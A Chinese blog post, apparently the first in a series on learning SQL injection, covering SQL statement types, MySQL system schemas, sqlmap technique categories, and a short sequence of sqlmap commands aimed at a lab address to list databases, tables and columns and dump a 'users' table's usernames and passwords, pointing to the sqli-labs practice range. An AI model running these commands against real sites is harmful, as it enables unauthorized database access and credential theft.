0
点赞
收藏
分享

微信扫一扫

学习SQL注入系列篇(1)

自由情感小屋 2022-04-08 阅读 32

文章目录

SQL注入原理和流程

SQL类型

  • DQL:数据查询语言(select)
  • DML:数据操作语言(insert, update, delete)
  • DDL:数据定义语言(create, drop, alter)
  • DCL:数据控制语言(grant, revoke, commit, rollback)
  • 函数:字符串函数、数字函数、日期函数
  • 运算符:算术运算符、比较运算符、逻辑运算符、位运算符

获取数据库信息

  • show命令
  • select + 函数
  • 系统库

系统库

系统库描述
information_schemaMySQL服务器所有数据库的信息
mysql基存储数据库的用户、权限设置、关键字等
performance_schema主要用于收集数据库服务器性能参数
sys数据来自performance_schema

SQL注入工具

sqlmap

类型描述
boolean-based blind基于Boolean的盲注
time-based blind基于时间的盲注
error-based基于报错
UNION query-based基于联合查询
stacked queries基于多条SQL语句(堆叠注入)
out-of-band(OOB)非应用内通信注入,比如DNSLog

1. SQLmap常用命令使用

sqlmap -u  http://192.168.2.200/url.php?id=1
sqlmap -u  "http://192.168.2.200/url.php?id=1" --current-db
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbs
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security"  --tables
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users"  --col
sqlmap -u  "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql  -D "security" -T "users" -C "password,username" --dump

靶场: sqli-labs
支持php7的代码链接地址: sqli_labs_sqli-version

举报

相关推荐

0 条评论